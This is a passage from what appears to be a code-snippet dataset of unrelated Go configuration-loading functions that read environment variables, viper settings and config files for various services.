cfg.Global.Datacenters\n\t\t\t}\n\t\t\troundtrip := DefaultRoundTripperCount\n\t\t\t_, roundtripTmp, errRoundtrip := getEnvKeyValue(\"VCENTER_\"+id+\"_ROUNDTRIP\", false)\n\t\t\tif errRoundtrip != nil {\n\t\t\t\troundtripFlagTmp, errTmp := strconv.ParseUint(roundtripTmp, 10, 32)\n\t\t\t\tif errTmp == nil {\n\t\t\t\t\troundtrip = uint(roundtripFlagTmp)\n\t\t\t\t}\n\t\t\t}\n\t\t\t_, caFile, errCaFile := getEnvKeyValue(\"VCENTER_\"+id+\"_CAFILE\", false)\n\t\t\tif errCaFile != nil {\n\t\t\t\tcaFile = cfg.Global.CAFile\n\t\t\t}\n\t\t\t_, thumbprint, errThumbprint := getEnvKeyValue(\"VCENTER_\"+id+\"_THUMBPRINT\", false)\n\t\t\tif errThumbprint != nil {\n\t\t\t\tthumbprint = cfg.Global.Thumbprint\n\t\t\t}\n\n\t\t\t_, secretName, secretNameErr := getEnvKeyValue(\"VCENTER_\"+id+\"_SECRET_NAME\", false)\n\t\t\t_, secretNamespace, secretNamespaceErr := getEnvKeyValue(\"VCENTER_\"+id+\"_SECRET_NAMESPACE\", false)\n\n\t\t\tif secretNameErr != nil || secretNamespaceErr != nil {\n\t\t\t\tsecretName = \"\"\n\t\t\t\tsecretNamespace = \"\"\n\t\t\t}\n\t\t\tsecretRef := DefaultCredentialManager\n\t\t\tif secretName != \"\" && secretNamespace != \"\" {\n\t\t\t\tsecretRef = vcenter\n\t\t\t}\n\n\t\t\tiPFamilyPriority := []string{DefaultIPFamily}\n\t\t\t_, ipFamily, errIPFamily := getEnvKeyValue(\"VCENTER_\"+id+\"_IP_FAMILY\", false)\n\t\t\tif errIPFamily != nil {\n\t\t\t\tiPFamilyPriority = []string{ipFamily}\n\t\t\t}\n\n\t\t\t// If server is explicitly set, that means the vcenter value above is the TenantRef\n\t\t\tvcenterIP := vcenter\n\t\t\ttenantRef := vcenter\n\t\t\tif server != \"\" {\n\t\t\t\tvcenterIP = server\n\t\t\t\ttenantRef = vcenter\n\t\t\t}\n\n\t\t\tvar vcc *VirtualCenterConfig\n\t\t\tif cfg.VirtualCenter[tenantRef] != nil {\n\t\t\t\tvcc = cfg.VirtualCenter[tenantRef]\n\t\t\t} else {\n\t\t\t\tvcc = &VirtualCenterConfig{}\n\t\t\t\tcfg.VirtualCenter[tenantRef] = vcc\n\t\t\t}\n\n\t\t\tvcc.User = username\n\t\t\tvcc.Password = password\n\t\t\tvcc.TenantRef = tenantRef\n\t\t\tvcc.VCenterIP = vcenterIP\n\t\t\tvcc.VCenterPort = port\n\t\t\tvcc.InsecureFlag = insecureFlag\n\t\t\tvcc.Datacenters = datacenters\n\t\t\tvcc.RoundTripperCount = roundtrip\n\t\t\tvcc.CAFile = caFile\n\t\t\tvcc.Thumbprint = thumbprint\n\t\t\tvcc.SecretRef = secretRef\n\t\t\tvcc.SecretName = secretName\n\t\t\tvcc.SecretNamespace = secretNamespace\n\t\t\tvcc.IPFamilyPriority = iPFamilyPriority\n\t\t}\n\t}\n\n\treturn nil\n}", "func initConfig() *domain.ApplicationConfig {\n\tconfigPath := util.GetEnv(envConfigPath, defaultConfigPath)\n\tprefix := util.GetEnv(envConfigPrefix, defaultConfigPrefix)\n\tcfg, err := util.ReadConfig(configPath, prefix)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn cfg\n}", "func NewConfig(fileName FilePath) *Config {\n\n\tif err := godotenv.Load(string(fileName)); err != nil {\n\t\tlog.Printf(\"Config file not found for file name: %s\", fileName)\n\t\tpanic(err)\n\t}\n\n\treturn &Config{\n\t\tserverConfig: server.Config{\n\t\t\tHost: os.Getenv(\"SERVER_HOST\"),\n\t\t\tPort: convertToInt(os.Getenv(\"SERVER_PORT\")),\n\t\t\tListenLimit: convertToInt(os.Getenv(\"SERVER_LISTEN_LIMIT\")),\n\t\t\tKeepAlive: convertToInt(os.Getenv(\"SERVER_KEEP_ALIVE_TIME\")),\n\t\t\tReadTimeout: convertToInt(os.Getenv(\"SERVER_READ_TIMEOUT\")),\n\t\t\tWriteTimeout: convertToInt(os.Getenv(\"SERVER_WRITE_TIMEOUT\")),\n\t\t\tShutdownTimeout: convertToInt(os.Getenv(\"SERVER_SHUTDOWN_TIME\")),\n\t\t},\n\t\tdbConfig: mysql.Config{\n\t\t\tHost: os.Getenv(\"MYSQL_HOST\"),\n\t\t\tPort: convertToInt(os.Getenv(\"MYSQL_PORT\")),\n\t\t\tDatabase: os.Getenv(\"MYSQL_DATABASE\"),\n\t\t\tUser: os.Getenv(\"MYSQL_USER\"),\n\t\t\tPassword: os.Getenv(\"MYSQL_PASSWORD\"),\n\t\t},\n\t\trequestsConfig: requests.Config{\n\t\t\tArjBackendURL: os.Getenv(\"ARJ_BACKEND_URL\"),\n\t\t},\n\t}\n}", "func InitConfig() Config {\n\tif !(testingMode == \"true\") && gopath != \"\" {\n\t\tfullpath := gopath + \"/src/github.com/lancetw/lubike/.env\"\n\t\terr := godotenvLoad(fullpath)\n\t\tif err != nil {\n\t\t\tlogFatalf(\"Error loading .env file %v\", fullpath)\n\t\t}\n\t}\n\n\tvar config Config\n\tconfig.UbikeEndpoint = os.Getenv(\"UBIKE_ENDPOINT\")\n\tconfig.UbikeEndpointTimeout, _ = strconv.Atoi(os.Getenv(\"UBIKE_ENDPOINT_TIMEOUT\"))\n\tconfig.MapquestAPIKey = os.Getenv(\"MAPQUEST_API_KEY\")\n\tconfig.MapquestRouteMatrixEndpoint = os.Getenv(\"MAPQUEST_ROUTE_MATRIX_ENDPOINT\")\n\tconfig.MapquestRouteMatrixEndpointTimeout, _ = strconv.Atoi(os.Getenv(\"MAPQUEST_ROUTE_MATRIX_ENDPOINT_TIMEOUT\"))\n\tconfig.GoogleMapMatrixAPIKey = os.Getenv(\"GOOGLEMAP_MATRIX_API_KEY\")\n\tconfig.GoogleMapMatrixEndpoint = os.Getenv(\"GOOGLEMAP_MATRIX_ENDPOINT\")\n\tconfig.GoogleMapMatrixEndpointTimeout, _ = strconv.Atoi(os.Getenv(\"GOOGLEMAP_MATRIX_API_ENDPOINT_TIMEOUT\"))\n\n\treturn config\n}", "func initBaseConf() {\n\tssLEnable := false\n\tif viper.GetBool(defaultEnvHttpsEnable) {\n\t\tssLEnable = true\n\t} else {\n\t\tssLEnable = viper.GetBool(\"sslEnable\")\n\t}\n\trunMode := viper.GetString(\"runmode\")\n\tvar apiBase string\n\tif \"debug\" == runMode {\n\t\tapiBase = viper.GetString(\"dev_url\")\n\t} else if \"test\" == runMode {\n\t\tapiBase = viper.GetString(\"test_url\")\n\t} else {\n\t\tapiBase = viper.GetString(\"prod_url\")\n\t}\n\n\turi, err := url.Parse(apiBase)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tbaseHOSTByEnv := viper.GetString(defaultEnvHost)\n\tif baseHOSTByEnv != \"\" {\n\t\turi.Host = baseHOSTByEnv\n\t\tapiBase = uri.String()\n\t} else {\n\t\tisAutoHost := viper.GetBool(defaultEnvAutoGetHost)\n\t\tSugar().Debugf(\"isAutoHost %v\", isAutoHost)\n\t\tif isAutoHost {\n\t\t\tipv4, err := sys.NetworkLocalIP()\n\t\t\tif err == nil {\n\t\t\t\taddrStr := viper.GetString(\"addr\")\n\t\t\t\tvar proc string\n\t\t\t\tif ssLEnable {\n\t\t\t\t\tproc = \"https\"\n\t\t\t\t} else {\n\t\t\t\t\tproc = \"http\"\n\t\t\t\t}\n\t\t\t\tapiBase = fmt.Sprintf(\"%v://%v%v\", proc, ipv4, addrStr)\n\t\t\t}\n\t\t}\n\t}\n\n\tif ssLEnable {\n\t\tapiBase = strings.Replace(apiBase, \"http://\", \"https://\", 1)\n\t}\n\tSugar().Debugf(\"config file uri.Host %v\", uri.Host)\n\tSugar().Debugf(\"apiBase %v\", apiBase)\n\tbaseConf = BaseConf{\n\t\tBaseURL: apiBase,\n\t\tSSLEnable: ssLEnable,\n\t}\n}", "func NewConfig(\n\tloadGlobalConfig, loadUserConfig bool,\n\tconfigName, configType string) *Config {\n\n\tlog.Debug(\"initializing configuration\")\n\n\tc := &Config{\n\t\tsecureConfig: secureConfig{},\n\t\tplainTextConfig: plainTextConfig{},\n\t\tViper: viper.New(),\n\t\tGlobalFlags: &flag.FlagSet{},\n\t\tAdditionalFlags: &flag.FlagSet{},\n\t\tjsonMarshalStrategy: JSONMarshalSecure,\n\t}\n\tc.Viper.SetTypeByDefaultValue(true)\n\tc.Viper.SetConfigName(configName)\n\tc.Viper.SetConfigType(configType)\n\n\tcfgFile := fmt.Sprintf(\"%s.%s\", configName, configType)\n\tetcRexRayFile := util.EtcFilePath(cfgFile)\n\tusrRexRayFile := fmt.Sprintf(\"%s/.rexray/%s\", util.HomeDir(), cfgFile)\n\n\tif loadGlobalConfig && util.FileExists(etcRexRayFile) {\n\t\tlog.WithField(\"path\", etcRexRayFile).Debug(\"loading global config file\")\n\t\tif err := c.ReadConfigFile(etcRexRayFile); err != nil {\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"path\": etcRexRayFile,\n\t\t\t\t\"error\": err}).Error(\n\t\t\t\t\"error reading global config file\")\n\t\t}\n\t}\n\n\tif loadUserConfig && util.FileExists(usrRexRayFile) {\n\t\tlog.WithField(\"path\", usrRexRayFile).Debug(\"loading user config file\")\n\t\tif err := c.ReadConfigFile(usrRexRayFile); err != nil {\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"path\": usrRexRayFile,\n\t\t\t\t\"error\": err}).Error(\n\t\t\t\t\"error reading user config file\")\n\t\t}\n\t}\n\n\tc.initConfigKeys()\n\n\treturn c\n\n}", "func NewConfig(config *configuration.Data, setTemplateRepoInfo TemplateRepoInfoSetter, clusterUser, clusterToken, clusterURL string) Config {\n\ttr := &http.Transport{\n\t\tTLSClientConfig: &tls.Config{\n\t\t\tInsecureSkipVerify: config.APIServerInsecureSkipTLSVerify(),\n\t\t},\n\t}\n\n\tconf := Config{\n\t\tOriginalConfig: config,\n\t\tConsoleURL: config.GetConsoleURL(),\n\t\tHTTPTransport: tr,\n\t\tMasterUser: clusterUser,\n\t\tToken: clusterToken,\n\t\tMasterURL: clusterURL,\n\t}\n\treturn setTemplateRepoInfo(conf)\n}", "func NewConfig(username, password string) (Config, error) {\n\talias := os.Getenv(\"CLC_ALIAS\")\n\tagent := userAgentDefault\n\tif v := os.Getenv(\"CLC_USER_AGENT\"); v != \"\" {\n\t\tagent = v\n\t}\n\tbase := baseUriDefault\n\tif v := os.Getenv(\"CLC_BASE_URL\"); v != \"\" {\n\t\tbase = v\n\t}\n\turi, err := url.Parse(base)\n\treturn Config{\n\t\tUser: User{\n\t\t\tUsername: username,\n\t\t\tPassword: password,\n\t\t},\n\t\tAlias: alias,\n\t\tBaseURL: uri,\n\t\tUserAgent: agent,\n\t}, err\n}", "func initConfig() {\n\tlog.SetHandler(text.New(os.Stderr))\n\tif debug {\n\t\tlog.SetLevel(log.DebugLevel)\n\t}\n\tviper.SetEnvPrefix(\"ecs\")\n\tviper.AutomaticEnv() // read in environment variables that match\n\tif cfgFile != \"\" || environment != \"\" {\n\t\t// Use config file from the flag. cfgFile takes precedence over environment\n\t\tif cfgFile != \"\" {\n\t\t\tviper.SetConfigFile(cfgFile)\n\t\t} else {\n\t\t\tif cfg, err := findConfigByEnvironment(environment); err != nil {\n\t\t\t\tlog.WithError(err).Fatal(\"Can't find the config\")\n\t\t\t} else {\n\t\t\t\tviper.SetConfigFile(cfg)\n\t\t\t}\n\t\t}\n\t\t// If a config file is found, read it in.\n\t\tif err := viper.ReadInConfig(); err == nil {\n\t\t\tlog.Infof(\"Using config file: %s\", viper.ConfigFileUsed())\n\t\t} else {\n\t\t\tlog.WithError(err).Fatal(\"Had some errors while parsing the config\")\n\t\t\tos.Exit(1)\n\t\t}\n\t}\n\n}", "func initConfig() {\n\n\tviper.SetEnvPrefix(`HELM_API`)\n\n\te := viper.BindEnv(\n\t\t`DEBUG`,\n\t)\n\tif e != nil {\n\t\tpanic(e)\n\t}\n\n\te = viper.BindEnv(\n\t\t`LOGLEVEL`,\n\t)\n\tif e != nil {\n\t\tpanic(e)\n\t}\n\tviper.SetDefault(`LOGLEVEL`, `info`)\n\n\te = viper.BindEnv(\n\t\t`TMP`,\n\t)\n\tif e != nil {\n\t\tpanic(e)\n\t}\n\tviper.SetDefault(`TMP`, `/var/tmp/helm-api`)\n\n\te = viper.BindEnv(`PORT`)\n\tviper.SetDefault(`PORT`, `8848`)\n\tif e != nil {\n\t\tpanic(e)\n\t}\n\n\te = viper.BindEnv(`HTTP_PORT`)\n\tviper.SetDefault(`HTTP_PORT`, `8611`)\n\tif e != nil {\n\t\tpanic(e)\n\t}\n\n\tviper.AllowEmptyEnv(true)\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tutils.Error().Err(err).Send()\n\t}\n}", "func NewConfig(issuer, keyID string, env Environment) Config {\n\treturn Config{\n\t\tenv: env,\n\t\tissuer: issuer,\n\t\tkeyID: keyID,\n\t}\n}", "func NewConfig() *Config {\n\n\tconf := &Config{}\n\n\tflag.StringVar(&conf.serverAddr, \"serverAddr\", os.Getenv(\"SERVER_HOST\"), \"server host\")\n\tflag.StringVar(&conf.serverPort, \"serverPort\", os.Getenv(\"SERVER_PORT\"), \"server port\")\n\t// flag.StringVar(&conf.MongoURL, \"mongoURL\", \"mongodb://127.0.0.1:27017\", \"mongodb url\")\n\tflag.StringVar(&conf.mongoUsername, \"mongoUsername\", os.Getenv(\"MONGODB_USERNAME\"), \"mongodb username\")\n\tflag.StringVar(&conf.mongoPassword, \"mongoPassword\", os.Getenv(\"MONGODB_PASSWORD\"), \"mongodb password\")\n\tflag.StringVar(&conf.mongoURI, \"mongoURI\", os.Getenv(\"MONGODB_URI\"), \"mongodb uri\")\n\t// flag.StringVar(&conf.Database, \"database\", \"Lessons\", \"datbase\")\n\tflag.StringVar(&conf.Database, \"database\", os.Getenv(\"DB_NAME\"), \"datbase\")\n\tflag.StringVar(&conf.LessonCollection, \"lessonCollection\", os.Getenv(\"DB_COLLECTION\"), \"database collecion of lesson\")\n\tflag.StringVar(&conf.ModelCollection, \"modelCollection\", \"model\", \"database collecion of model\")\n\n\tflag.Parse()\n\n\treturn conf\n}", "func initConfig() {\n\thome, err := homedir.Dir()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n\n\ttdPath := path.Join(home, \".td\")\n\tif _, err := os.Stat(tdPath); os.IsNotExist(err) {\n\t\tos.MkdirAll(tdPath, os.ModePerm)\n\t}\n\n\tviper.AddConfigPath(tdPath)\n\tviper.Set(\"tdPath\", tdPath)\n\tviper.SetConfigName(\".config\")\n\tviper.AutomaticEnv()\n\n\tif err := viper.ReadInConfig(); err != nil {\n\t\tviper.WriteConfigAs(path.Join(tdPath, \".config.json\"))\n\t}\n\n\tviper.SetDefault(\"boards_file\", path.Join(tdPath, \"boards.json\"))\n\tviper.SetDefault(\"current_board\", \"default\")\n}", "func New() *Config {\n\tvar conf Config\n\tappName := \"live-config\"\n\n\terr := envconfig.Process(appName, &conf)\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn &conf\n}", "func initConfig() {\n\n\tviper.SetDefault(\"server_port\", 3000)\n\tviper.SetDefault(\"database_file\", \"instagram_bot.db\")\n\n\tif cfgFile != \"\" {\n\t\t// Use config file from the flag.\n\t\tviper.SetConfigFile(cfgFile)\n\t} else {\n\t\t// Find home directory.\n\t\thome, err := homedir.Dir()\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\tviper.SetConfigName(\"config\") // name of config file (without extension)\n\t\tviper.AddConfigPath(home) // call multiple times to add many search paths\n\t\tviper.AddConfigPath(\".\") // optionally look for config in the working directory\n\t\terr = viper.ReadInConfig() // Find and read the config file\n\t}\n\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tfmt.Println(\"Using config file:\", viper.ConfigFileUsed())\n\t} else {\n\n\t}\n}", "func (c *configuration) cmdlineOverride(opts *cliOptions) {\n\t// Populate options that can be provided on both the commandline and config.\n\tif opts.Port > 0 {\n\t\tc.Port = int(opts.Port)\n\t}\n\tif opts.Rank != nil {\n\t\t// global rank parameter should only apply to first I/O service\n\t\tc.Servers[0].Rank = opts.Rank\n\t}\n\tif opts.Insecure {\n\t\tc.TransportConfig.AllowInsecure = true\n\t}\n\t// override each per-server config\n\tfor i := range c.Servers {\n\t\tsrv := &c.Servers[i]\n\n\t\tif opts.MountPath != \"\" {\n\t\t\t// override each per-server config in addition to global value\n\t\t\tc.ScmMountPath = opts.MountPath\n\t\t\tsrv.ScmMount = opts.MountPath\n\t\t} else if srv.ScmMount == \"\" {\n\t\t\t// if scm not specified for server, apply global\n\t\t\tsrv.ScmMount = c.ScmMountPath\n\t\t}\n\t\tif opts.Cores > 0 {\n\t\t\tlog.Debugf(\"-c option deprecated, please use -t instead\")\n\t\t\tsrv.Targets = int(opts.Cores)\n\t\t}\n\t\t// Targets should override Cores if specified in cmdline or\n\t\t// config file.\n\t\tif opts.Targets > 0 {\n\t\t\tsrv.Targets = int(opts.Targets)\n\t\t}\n\t\tif opts.NrXsHelpers != nil {\n\t\t\tsrv.NrXsHelpers = int(*opts.NrXsHelpers)\n\t\t}\n\t\tif opts.FirstCore > 0 {\n\t\t\tsrv.FirstCore = int(opts.FirstCore)\n\t\t}\n\t}\n\n\tif opts.Group != \"\" {\n\t\tc.SystemName = opts.Group\n\t}\n\tif opts.SocketDir != \"\" {\n\t\tc.SocketDir = opts.SocketDir\n\t}\n\tif opts.Modules != nil {\n\t\tc.Modules = *opts.Modules\n\t}\n\tif opts.Attach != nil {\n\t\tc.Attach = *opts.Attach\n\t}\n\tif opts.Map != nil {\n\t\tc.SystemMap = *opts.Map\n\t}\n}", "func configDefault(config ...Config) Config {\n\t// Return default config if nothing provided\n\tif len(config) < 1 {\n\t\treturn ConfigDefault\n\t}\n\n\t// Override default config\n\tcfg := config[0]\n\n\t// Set default values\n\tif cfg.Host == \"\" {\n\t\tcfg.Host = ConfigDefault.Host\n\t}\n\tif cfg.Port <= 0 {\n\t\tcfg.Port = ConfigDefault.Port\n\t}\n\tif cfg.Database == \"\" {\n\t\tcfg.Database = ConfigDefault.Database\n\t}\n\tif cfg.Table == \"\" {\n\t\tcfg.Table = ConfigDefault.Table\n\t}\n\tif int(cfg.GCInterval.Seconds()) <= 0 {\n\t\tcfg.GCInterval = ConfigDefault.GCInterval\n\t}\n\treturn cfg\n}", "func initConfig() {\n\n\t_, hasToken := os.LookupEnv(\"PRIVATE_ACCESS_TOKEN\")\n\t_, hasURL := os.LookupEnv(\"CI_PROJECT_URL\")\n\tif !hasToken || !hasURL {\n\t\tlog.Fatal(\"You need to set 'CI_PROJECT_URL' and 'PRIVATE_ACCESS_TOKEN'\")\n\t}\n\n\tviper.Set(\"Token\", os.Getenv(\"PRIVATE_ACCESS_TOKEN\"))\n\tviper.Set(\"ProjectUrl\", os.Getenv(\"CI_PROJECT_URL\"))\n\n\tu, err := url.Parse(viper.GetString(\"ProjectUrl\"))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tviper.Set(\"BaseUrl\", fmt.Sprintf(\"%s://%s\", u.Scheme, u.Host))\n\tviper.Set(\"RegistryUrl\", fmt.Sprintf(\"%s/container_registry.json\", viper.GetString(\"ProjectUrl\")))\n\n}", "func newConfig(opts ...Option) config {\n\tc := config{\n\t\tMeterProvider: otel.GetMeterProvider(),\n\t}\n\tfor _, opt := range opts {\n\t\topt.apply(&c)\n\t}\n\treturn c\n}", "func NewConfig() (*Config, error){\n\n\tvar config Config\n\n\tif err := envconfig.Process(\"APP\", &config); err != nil {\n\t\treturn nil, fmt.Errorf(\"error loading values from environment variables: %s\",\n\t\terr.Error())\n\t}\n\n\treturn &config, nil\n}", "func newSSHDefaultConfig(userName, identity string) (*sshClientConfig, error) {\n\tconfig, err := sshDefaultConfig(userName, identity)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &sshClientConfig{ClientConfig: config}, nil\n}", "func initConfig() {\n\t// viper.AutomaticEnv() // read in environment variables that match\n\n\t// If a config file is found, read it in.\n\tviper.SetConfigFile(configFile)\n\tif err := viper.ReadInConfig(); err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Load config to memory.\n\tconfig.Server = viper.GetString(\"server\")\n\tif config.Server == \"\" {\n\t\tconfig.Server = defaultServer\n\t}\n\n\tconfig.LogDir = viper.GetString(\"log_dir\")\n\tif config.LogDir == \"\" {\n\t\tconfig.LogDir = defaultLogDir\n\t}\n\n\tconfig.LogLevel = viper.GetString(\"log_level\")\n\tif config.LogLevel == \"\" {\n\t\tconfig.LogLevel = defaultLogLevel\n\t}\n\n\tlogging.Init(config.LogDir, defaultLogFilename, config.LogLevel, 1, false)\n}", "func initConfig() {\n\tif cfgFile != \"\" {\n\t\t// Use config file from the flag.\n\t\tviper.SetConfigFile(cfgFile)\n\t} else {\n\t\t// Find home directory.\n\t\thome, err := homedir.Dir()\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\t// Search config in home directory with name \".server\" (without extension).\n\t\tviper.AddConfigPath(home)\n\t\tviper.SetConfigName(\".server\")\n\t}\n\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tfmt.Println(\"Using config file:\", viper.ConfigFileUsed())\n\t}\n}", "func InitConfig() {\n\tglobalConfig.BackendServerAddr = \"http://localhost:8080\"\n}", "func NewConfig() *Config {\n\treturn &Config{\n\t\tMode: \t\t gin.ReleaseMode,\n\t\tMiddlewares: []string{},\n\t\tHealthz: \t true,\n\t}\n}", "func NewConfig(loc string) (cfg *Config, err error) {\n\tvar c Config\n\tif _, err = toml.DecodeFile(loc, &c); err != nil {\n\t\treturn\n\t}\n\n\tif err = c.loadIncludes(); err != nil {\n\t\treturn\n\t}\n\n\tif c.Dir == \"\" {\n\t\tc.Dir = \"./\"\n\t}\n\n\tif c.Environment == nil {\n\t\tc.Environment = make(map[string]string)\n\t}\n\n\tc.populateFromOSEnv()\n\tcfg = &c\n\treturn\n}", "func MakeDefaultConfig(clusterGRPCAddress string, oauthServerAddress string, insecure bool) Config {\n\treturn Config{\n\t\tBase: conf.Base{\n\t\t\tLog: conf.Log{\n\t\t\t\tFormat: \"console\",\n\t\t\t\tLevel: log.InfoLevel,\n\t\t\t},\n\t\t},\n\t\tInputFormat: \"json\",\n\t\tOutputFormat: \"json\",\n\t\tOAuthServerAddress: oauthServerAddress,\n\t\tIdentityServerGRPCAddress: clusterGRPCAddress,\n\t\tGatewayServerEnabled: true,\n\t\tGatewayServerGRPCAddress: clusterGRPCAddress,\n\t\tNetworkServerEnabled: true,\n\t\tNetworkServerGRPCAddress: clusterGRPCAddress,\n\t\tApplicationServerEnabled: true,\n\t\tApplicationServerGRPCAddress: clusterGRPCAddress,\n\t\tJoinServerEnabled: true,\n\t\tJoinServerGRPCAddress: clusterGRPCAddress,\n\t\tDeviceTemplateConverterGRPCAddress: clusterGRPCAddress,\n\t\tDeviceClaimingServerGRPCAddress: clusterGRPCAddress,\n\t\tQRCodeGeneratorGRPCAddress: clusterGRPCAddress,\n\t\tPacketBrokerAgentGRPCAddress: clusterGRPCAddress,\n\t\tInsecure: insecure,\n\t\tRetry: defaultRetryConfig,\n\t\tTelemetry: defaultTelemetryConfig,\n\t}\n}", "func ReadConfig(file string) (*Config, error) {\n\n\tc := new(Config)\n\n\tlocalIP := net.ParseIP(\"127.0.0.1\")\n\n\t// defaults\n\tc.FlowAPI.Bind = fmt.Sprintf(\"%s:7777\", localIP)\n\tc.FlowAPI.Endpoint = c.FlowAPI.Bind\n\n\tc.IngressAPI.Bind = fmt.Sprintf(\"%s:6666\", localIP)\n\tc.IngressAPI.Endpoint = c.IngressAPI.Bind\n\n\tc.IsolateAPI.Bind = fmt.Sprintf(\"%s:8888\", localIP)\n\tc.IsolateAPI.Endpoint = c.IsolateAPI.Bind\n\tc.IsolateAPI.Isolation = \"vorteil\"\n\n\tc.SecretsAPI.Bind = fmt.Sprintf(\"%s:2610\", localIP)\n\tc.SecretsAPI.Endpoint = c.SecretsAPI.Bind\n\n\tc.Minio.Endpoint = \"127.0.0.1:9000\"\n\tc.Minio.User = \"vorteil\"\n\tc.Minio.Password = \"vorteilvorteil\"\n\tc.Minio.Encrypt = c.Minio.Password\n\tc.Minio.Region = \"us-east-1\"\n\n\tc.Kernel.Runtime = \"21.3.5\"\n\tc.Kernel.Linux = \"21.3.5\"\n\n\t// read config file if exists\n\tif len(file) > 0 {\n\n\t\tlog.Printf(\"read config file %s\", file)\n\n\t\tdata, err := ioutil.ReadFile(file)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\terr = toml.Unmarshal(data, c)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t}\n\n\t// overwrite with envs\n\tints := []struct {\n\t\tname string\n\t\tvalue *int\n\t}{\n\t\t{minioSecure, &c.Minio.Secure},\n\t\t{minioSSL, &c.Minio.SSL},\n\t\t{certSecure, &c.Certs.Secure},\n\t}\n\n\tfor _, i := range ints {\n\t\terr := setInt(c, i.name, i.value)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tstrings := []struct {\n\t\tname string\n\t\tvalue *string\n\t}{\n\t\t{dbConn, &c.Database.DB},\n\t\t{minioEndpoint, &c.Minio.Endpoint},\n\t\t{minioUser, &c.Minio.User},\n\t\t{minioPassword, &c.Minio.Password},\n\t\t{minioEncrypt, &c.Minio.Encrypt},\n\t\t{instanceLoggingDriver, &c.InstanceLogging.Driver},\n\t\t{minioRegion, &c.Minio.Region},\n\t\t{kernelLinux, &c.Kernel.Linux},\n\t\t{kernelRuntime, &c.Kernel.Runtime},\n\t\t{flowBind, &c.FlowAPI.Bind},\n\t\t{flowEndpoint, &c.FlowAPI.Endpoint},\n\t\t{flowRegistry, &c.FlowAPI.Registry.Name},\n\t\t{flowRegistryUser, &c.FlowAPI.Registry.User},\n\t\t{flowRegistryToken, &c.FlowAPI.Registry.Token},\n\t\t{ingressBind, &c.IngressAPI.Bind},\n\t\t{ingressEndpoint, &c.IngressAPI.Endpoint},\n\t\t{isolateBind, &c.IsolateAPI.Bind},\n\t\t{isolateEndpoint, &c.IsolateAPI.Endpoint},\n\t\t{secretsBind, &c.SecretsAPI.Bind},\n\t\t{secretsEndpoint, &c.SecretsAPI.Endpoint},\n\t\t{secretsConn, &c.SecretsAPI.DB},\n\t\t{certDir, &c.Certs.Directory},\n\t\t{isolation, &c.IsolateAPI.Isolation},\n\t}\n\n\tfor _, i := range strings {\n\t\terr := setString(c, i.name, i.value)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\t// test database is set\n\tif len(c.Database.DB) == 0 && len(c.SecretsAPI.DB) == 0 {\n\t\treturn nil, fmt.Errorf(\"no database configured\")\n\t}\n\n\treturn c, nil\n\n}", "func NewConfig(appName string) (Config, error) {\n\tvar err error\n\tvar c Config\n\n\tif err = envconfig.Process(appName, &c); err != nil {\n\t\treturn Config{}, err\n\t}\n\treturn c, nil\n}", "func NewConfig() *Config {\n\terr := godotenv.Load()\n\tif err != nil {\n\t\tlogrus.Info(\"Error loading .env file\")\n\t}\n\n\tappHost := getEnv(\"APP_HOST\", \"0.0.0.0\")\n\tappPort := getEnv(\"APP_PORT\", \"8000\")\n\treturn &Config{\n\t\tAppVersion: getEnv(\"APP_VERSION\", \"0.0.0\"),\n\t\tAppHost: appHost,\n\t\tAppPort: appPort,\n\t\tAppAddr: net.JoinHostPort(appHost, appPort),\n\t\tRmqURI: getRequiredEnv(\"RMQ_URI\"),\n\t\tMongoURI: getRequiredEnv(\"MONGODB_CONNECTION_STRING\"),\n\t\tMongoDbName: getRequiredEnv(\"MONGO_DBNAME\"),\n\t\tMongoMigrationsDir: \"file://migrations\",\n\t\tPageSize: 25,\n\t\tLogLevel: getEnv(\"LOGS_LEVEL\", \"INFO\"),\n\t\tLogFormat: getEnv(\"LOGS_FORMAT\", \"TEXT\"),\n\t\tSentryDSN: getEnv(\"SENTRY_DSN\", \"\"),\n\t}\n}", "func createMainConfig(file *string, paths *string, basename *string) *viper.Viper {\n\tconfig := viper.New()\n\n\tconfig.SetEnvPrefix(utils.ConfigPrefix) // Env vars start with 'SLA_'\n\tconfig.AutomaticEnv()\n\tconfig.SetDefault(utils.CheckPeriodPropertyName, utils.DefaultCheckPeriod)\n\tconfig.SetDefault(utils.RepositoryTypePropertyName, utils.DefaultRepositoryType)\n\tconfig.SetDefault(utils.ExternalIDsPropertyName, utils.DefaultExternalIDs)\n\n\tif *file != \"\" {\n\t\tconfig.SetConfigFile(*file)\n\t} else {\n\t\tconfig.SetConfigName(*basename)\n\t\tfor _, path := range strings.Split(*paths, \":\") {\n\t\t\tconfig.AddConfigPath(path)\n\t\t}\n\t}\n\n\terrConfig := config.ReadInConfig()\n\tif errConfig != nil {\n\t\tlog.Println(\"Can't find configuration file: \" + errConfig.Error())\n\t\tlog.Println(\"Using defaults\")\n\t}\n\treturn config\n}", "func New(baseURL, user, pass string) *Config {\n\tif baseURL == \"\" {\n\t\tbaseURL = \"http://localhost:8080\" // default base URL\n\t}\n\tvar secret string\n\tif user != \"\" && pass != \"\" {\n\t\tsecret = 